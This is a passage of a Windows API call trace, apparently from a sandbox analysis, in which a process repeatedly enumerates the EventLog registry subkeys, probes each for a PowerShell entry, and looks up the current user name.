	[0145.228] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x3, lpName=0x2867a0, lpcchName=0x1cd218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1cd218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.228] CoTaskMemFree (pv=0x2867a0) 
	[0145.228] CoTaskMemFree (pv=0x0) 
	[0145.228] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.228] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x4, lpName=0x2867a0, lpcchName=0x1cd218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1cd218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.228] CoTaskMemFree (pv=0x2867a0) 
	[0145.228] CoTaskMemFree (pv=0x0) 
	[0145.228] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.228] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x5, lpName=0x2867a0, lpcchName=0x1cd218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1cd218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.228] CoTaskMemFree (pv=0x2867a0) 
	[0145.228] CoTaskMemFree (pv=0x0) 
	[0145.228] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.229] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x6, lpName=0x2867a0, lpcchName=0x1cd218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1cd218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.229] CoTaskMemFree (pv=0x2867a0) 
	[0145.229] CoTaskMemFree (pv=0x0) 
	[0145.229] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.229] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x7, lpName=0x2867a0, lpcchName=0x1cd218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1cd218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.229] CoTaskMemFree (pv=0x2867a0) 
	[0145.229] CoTaskMemFree (pv=0x0) 
	[0145.229] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.229] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x8, lpName=0x2867a0, lpcchName=0x1cd218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1cd218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.229] CoTaskMemFree (pv=0x2867a0) 
	[0145.229] CoTaskMemFree (pv=0x0) 
	[0145.229] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd278 | out: phkResult=0x1cd278*=0x340) returned 0x0
	[0145.229] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd278 | out: phkResult=0x1cd278*=0x0) returned 0x2
	[0145.229] RegOpenKeyExW (in: hKey=0x338, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd278 | out: phkResult=0x1cd278*=0x318) returned 0x0
	[0145.230] RegOpenKeyExW (in: hKey=0x318, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd278 | out: phkResult=0x1cd278*=0x0) returned 0x2
	[0145.230] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd278 | out: phkResult=0x1cd278*=0x348) returned 0x0
	[0145.230] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd278 | out: phkResult=0x1cd278*=0x0) returned 0x2
	[0145.230] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd278 | out: phkResult=0x1cd278*=0x34c) returned 0x0
	[0145.230] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd278 | out: phkResult=0x1cd278*=0x0) returned 0x2
	[0145.230] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd278 | out: phkResult=0x1cd278*=0x350) returned 0x0
	[0145.230] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd278 | out: phkResult=0x1cd278*=0x0) returned 0x2
	[0145.231] RegOpenKeyExW (in: hKey=0x338, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd278 | out: phkResult=0x1cd278*=0x354) returned 0x0
	[0145.231] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd278 | out: phkResult=0x1cd278*=0x0) returned 0x2
	[0145.231] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd278 | out: phkResult=0x1cd278*=0x358) returned 0x0
	[0145.231] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd278 | out: phkResult=0x1cd278*=0x0) returned 0x2
	[0145.231] RegOpenKeyExW (in: hKey=0x338, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd278 | out: phkResult=0x1cd278*=0x35c) returned 0x0
	[0145.231] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd278 | out: phkResult=0x1cd278*=0x0) returned 0x2
	[0145.231] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd278 | out: phkResult=0x1cd278*=0x360) returned 0x0
	[0145.232] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd278 | out: phkResult=0x1cd278*=0x364) returned 0x0
	[0145.232] RegCloseKey (hKey=0x364) returned 0x0
	[0145.232] RegCloseKey (hKey=0x338) returned 0x0
	[0145.233] RegCloseKey (hKey=0x360) returned 0x0
	[0145.376] CoTaskMemAlloc (cb=0x804) returned 0x1b839ac0
	[0145.376] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b839ac0, nSize=0x1cd488 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd488) returned 0x1
	[0145.378] CoTaskMemFree (pv=0x1b839ac0) 
	[0145.380] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.380] GetUserNameW (in: lpBuffer=0x2867a0, pcbBuffer=0x1cd4c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd4c8) returned 1
	[0145.380] CoTaskMemFree (pv=0x2867a0) 
	[0145.810] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd1c8 | out: phkResult=0x1cd1c8*=0x368) returned 0x0
	[0145.810] RegQueryInfoKeyW (in: hKey=0x368, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd13c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd138, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd13c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd138*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.810] CoTaskMemFree (pv=0x0) 
	[0145.810] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.810] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x0, lpName=0x2867a0, lpcchName=0x1cd1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1cd1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.810] CoTaskMemFree (pv=0x2867a0) 
	[0145.811] CoTaskMemFree (pv=0x0) 
	[0145.811] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.811] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x1, lpName=0x2867a0, lpcchName=0x1cd1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1cd1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.811] CoTaskMemFree (pv=0x2867a0) 
	[0145.811] CoTaskMemFree (pv=0x0) 
	[0145.811] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.811] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x2, lpName=0x2867a0, lpcchName=0x1cd1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1cd1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.811] CoTaskMemFree (pv=0x2867a0) 
	[0145.811] CoTaskMemFree (pv=0x0) 
	[0145.811] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.811] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x3, lpName=0x2867a0, lpcchName=0x1cd1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1cd1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.811] CoTaskMemFree (pv=0x2867a0) 
	[0145.811] CoTaskMemFree (pv=0x0) 
	[0145.811] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.811] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x4, lpName=0x2867a0, lpcchName=0x1cd1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1cd1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.811] CoTaskMemFree (pv=0x2867a0) 
	[0145.811] CoTaskMemFree (pv=0x0) 
	[0145.811] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.811] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x5, lpName=0x2867a0, lpcchName=0x1cd1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1cd1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.811] CoTaskMemFree (pv=0x2867a0) 
	[0145.811] CoTaskMemFree (pv=0x0) 
	[0145.811] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.812] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x6, lpName=0x2867a0, lpcchName=0x1cd1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1cd1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.812] CoTaskMemFree (pv=0x2867a0) 
	[0145.812] CoTaskMemFree (pv=0x0) 
	[0145.812] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.812] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x7, lpName=0x2867a0, lpcchName=0x1cd1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1cd1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.812] CoTaskMemFree (pv=0x2867a0) 
	[0145.812] CoTaskMemFree (pv=0x0) 
	[0145.812] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.812] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x8, lpName=0x2867a0, lpcchName=0x1cd1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1cd1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.812] CoTaskMemFree (pv=0x2867a0) 
	[0145.812] CoTaskMemFree (pv=0x0) 
	[0145.812] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd228 | out: phkResult=0x1cd228*=0x36c) returned 0x0
	[0145.812] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd228 | out: phkResult=0x1cd228*=0x0) returned 0x2
	[0145.812] RegOpenKeyExW (in: hKey=0x368, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd228 | out: phkResult=0x1cd228*=0x370) returned 0x0
	[0145.812] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd228 | out: phkResult=0x1cd228*=0x0) returned 0x2
	[0145.813] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd228 | out: phkResult=0x1cd228*=0x374) returned 0x0
	[0145.813] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd228 | out: phkResult=0x1cd228*=0x0) returned 0x2
	[0145.813] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd228 | out: phkResult=0x1cd228*=0x378) returned 0x0
	[0145.813] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd228 | out: phkResult=0x1cd228*=0x0) returned 0x2
	[0145.813] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd228 | out: phkResult=0x1cd228*=0x37c) returned 0x0
	[0145.813] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd228 | out: phkResult=0x1cd228*=0x0) returned 0x2
	[0145.813] RegOpenKeyExW (in: hKey=0x368, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd228 | out: phkResult=0x1cd228*=0x380) returned 0x0
	[0145.813] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd228 | out: phkResult=0x1cd228*=0x0) returned 0x2
	[0145.813] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd228 | out: phkResult=0x1cd228*=0x384) returned 0x0
	[0145.814] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd228 | out: phkResult=0x1cd228*=0x0) returned 0x2
	[0145.814] RegOpenKeyExW (in: hKey=0x368, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd228 | out: phkResult=0x1cd228*=0x388) returned 0x0
	[0145.814] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd228 | out: phkResult=0x1cd228*=0x0) returned 0x2
	[0145.814] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd228 | out: phkResult=0x1cd228*=0x38c) returned 0x0
	[0145.814] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd228 | out: phkResult=0x1cd228*=0x390) returned 0x0
	[0145.814] RegCloseKey (hKey=0x390) returned 0x0
	[0145.814] RegCloseKey (hKey=0x368) returned 0x0
	[0145.815] RegCloseKey (hKey=0x38c) returned 0x0
	[0145.816] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd1c8 | out: phkResult=0x1cd1c8*=0x38c) returned 0x0
	[0145.816] RegQueryInfoKeyW (in: hKey=0x38c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd13c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd138, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd13c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd138*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.816] CoTaskMemFree (pv=0x0) 
	[0145.816] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.816] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x0, lpName=0x2867a0, lpcchName=0x1cd1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1cd1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.816] CoTaskMemFree (pv=0x2867a0) 
	[0145.817] CoTaskMemFree (pv=0x0) 
	[0145.817] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.817] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x1, lpName=0x2867a0, lpcchName=0x1cd1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1cd1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.817] CoTaskMemFree (pv=0x2867a0) 
	[0145.817] CoTaskMemFree (pv=0x0) 
	[0145.817] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.817] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x2, lpName=0x2867a0, lpcchName=0x1cd1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1cd1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.817] CoTaskMemFree (pv=0x2867a0) 
	[0145.817] CoTaskMemFree (pv=0x0) 
	[0145.817] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.817] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x3, lpName=0x2867a0, lpcchName=0x1cd1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1cd1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.817] CoTaskMemFree (pv=0x2867a0) 
	[0145.817] CoTaskMemFree (pv=0x0) 
	[0145.817] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.817] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x4, lpName=0x2867a0, lpcchName=0x1cd1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1cd1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.817] CoTaskMemFree (pv=0x2867a0) 
	[0145.817] CoTaskMemFree (pv=0x0) 
	[0145.817] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.817] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x5, lpName=0x2867a0, lpcchName=0x1cd1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1cd1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.817] CoTaskMemFree (pv=0x2867a0) 
	[0145.817] CoTaskMemFree (pv=0x0) 
	[0145.818] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.818] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x6, lpName=0x2867a0, lpcchName=0x1cd1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1cd1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.818] CoTaskMemFree (pv=0x2867a0) 
	[0145.818] CoTaskMemFree (pv=0x0) 
	[0145.818] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.818] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x7, lpName=0x2867a0, lpcchName=0x1cd1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1cd1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.818] CoTaskMemFree (pv=0x2867a0) 
	[0145.818] CoTaskMemFree (pv=0x0) 
	[0145.818] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.818] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x8, lpName=0x2867a0, lpcchName=0x1cd1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1cd1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.818] CoTaskMemFree (pv=0x2867a0) 
	[0145.818] CoTaskMemFree (pv=0x0) 
	[0145.818] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd228 | out: phkResult=0x1cd228*=0x368) returned 0x0
	[0145.818] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd228 | out: phkResult=0x1cd228*=0x0) returned 0x2
	[0145.818] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd228 | out: phkResult=0x1cd228*=0x390) returned 0x0
	[0145.818] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd228 | out: phkResult=0x1cd228*=0x0) returned 0x2
	[0145.819] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd228 | out: phkResult=0x1cd228*=0x394) returned 0x0
	[0145.819] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd228 | out: phkResult=0x1cd228*=0x0) returned 0x2
	[0145.819] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd228 | out: phkResult=0x1cd228*=0x398) returned 0x0
	[0145.819] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd228 | out: phkResult=0x1cd228*=0x0) returned 0x2
	[0145.819] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd228 | out: phkResult=0x1cd228*=0x39c) returned 0x0
	[0145.819] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd228 | out: phkResult=0x1cd228*=0x0) returned 0x2
	[0145.819] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd228 | out: phkResult=0x1cd228*=0x3a0) returned 0x0
	[0145.819] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd228 | out: phkResult=0x1cd228*=0x0) returned 0x2
	[0145.820] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd228 | out: phkResult=0x1cd228*=0x3a4) returned 0x0
	[0145.820] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd228 | out: phkResult=0x1cd228*=0x0) returned 0x2
	[0145.820] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd228 | out: phkResult=0x1cd228*=0x3a8) returned 0x0
	[0145.820] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd228 | out: phkResult=0x1cd228*=0x0) returned 0x2
	[0145.820] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd228 | out: phkResult=0x1cd228*=0x3ac) returned 0x0
	[0145.820] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd228 | out: phkResult=0x1cd228*=0x3b0) returned 0x0
	[0145.820] RegCloseKey (hKey=0x3b0) returned 0x0
	[0145.820] RegCloseKey (hKey=0x38c) returned 0x0
	[0145.821] RegCloseKey (hKey=0x3ac) returned 0x0
	[0145.821] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd198 | out: phkResult=0x1cd198*=0x3ac) returned 0x0
	[0145.821] RegQueryInfoKeyW (in: hKey=0x3ac, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd10c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd108, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd10c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd108*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.821] CoTaskMemFree (pv=0x0) 
	[0145.821] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.822] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x0, lpName=0x2867a0, lpcchName=0x1cd198, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1cd198, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.822] CoTaskMemFree (pv=0x2867a0) 
	[0145.822] CoTaskMemFree (pv=0x0) 
	[0145.822] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.822] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x1, lpName=0x2867a0, lpcchName=0x1cd198, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1cd198, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.822] CoTaskMemFree (pv=0x2867a0) 
	[0145.822] CoTaskMemFree (pv=0x0) 
	[0145.822] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0145.822] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x2, lpName=0x2867a0, lpcchName=0x1cd198, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1cd198, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.822] CoTaskMemFree (pv=0x2867a0) 
	[0145.822] CoTaskMemFree (pv=0x0) 
	[0145.822] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
